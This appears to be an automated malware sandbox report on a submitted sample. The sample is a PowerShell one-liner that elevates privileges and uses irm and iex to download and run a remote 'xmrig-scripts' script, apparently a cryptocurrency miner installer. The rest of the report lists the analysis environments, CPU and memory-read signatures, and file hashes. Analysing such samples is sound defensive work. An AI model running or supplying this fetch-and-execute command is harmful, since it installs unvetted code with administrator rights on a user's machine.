Analysis
-
max time kernel
1816s -
max time network
1823s -
platform
android_x64 -
resource
android-33-x64-arm64-20240624-en -
resource tags
androidarch:arm64arch:x64image:android-33-x64-arm64-20240624-enlocale:en-usos:android-13-x64system -
submitted
23-07-2024 02:00
Static task
static1
URLScan task
urlscan1
Behavioral task
behavioral1
Sample
http://start-process PowerShell -verb runas irm https://raw.githubusercontent.com/Lachine1/xmrig-scripts/main/windows.ps1 | iex
Resource
android-33-x64-arm64-20240624-en
Behavioral task
behavioral2
Sample
http://start-process PowerShell -verb runas irm https://raw.githubusercontent.com/Lachine1/xmrig-scripts/main/windows.ps1 | iex
Resource
debian12-armhf-20240221-en
Behavioral task
behavioral3
Sample
http://start-process PowerShell -verb runas irm https://raw.githubusercontent.com/Lachine1/xmrig-scripts/main/windows.ps1 | iex
Resource
debian9-mipsel-20240611-en
General
-
Target
http://start-process PowerShell -verb runas irm https://raw.githubusercontent.com/Lachine1/xmrig-scripts/main/windows.ps1 | iex
Malware Config
Signatures
-
Checks CPU information 2 TTPs 1 IoCs
description ioc Process File opened for read /proc/cpuinfo com.android.chrome -
Checks memory information 2 TTPs 1 IoCs
description ioc Process File opened for read /proc/meminfo com.android.chrome
Network
MITRE ATT&CK Mobile v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
170KB
MD5103241772064350c108a910378a32f2c
SHA15f880bebccdeb03bf19c66d0c27b57de27b035b6
SHA25681c7a12544ebe1487abba0bce93093bc2753d076e6d825be9b36990fd8434c92
SHA512fb09a3acb94c8d3bdc2c20cd484e400e3dd479c32adee532781612b567c9f38e472fb274215b84c4340f3cfcff554d89ccc3dcb4c1b3df62970483ede24862ad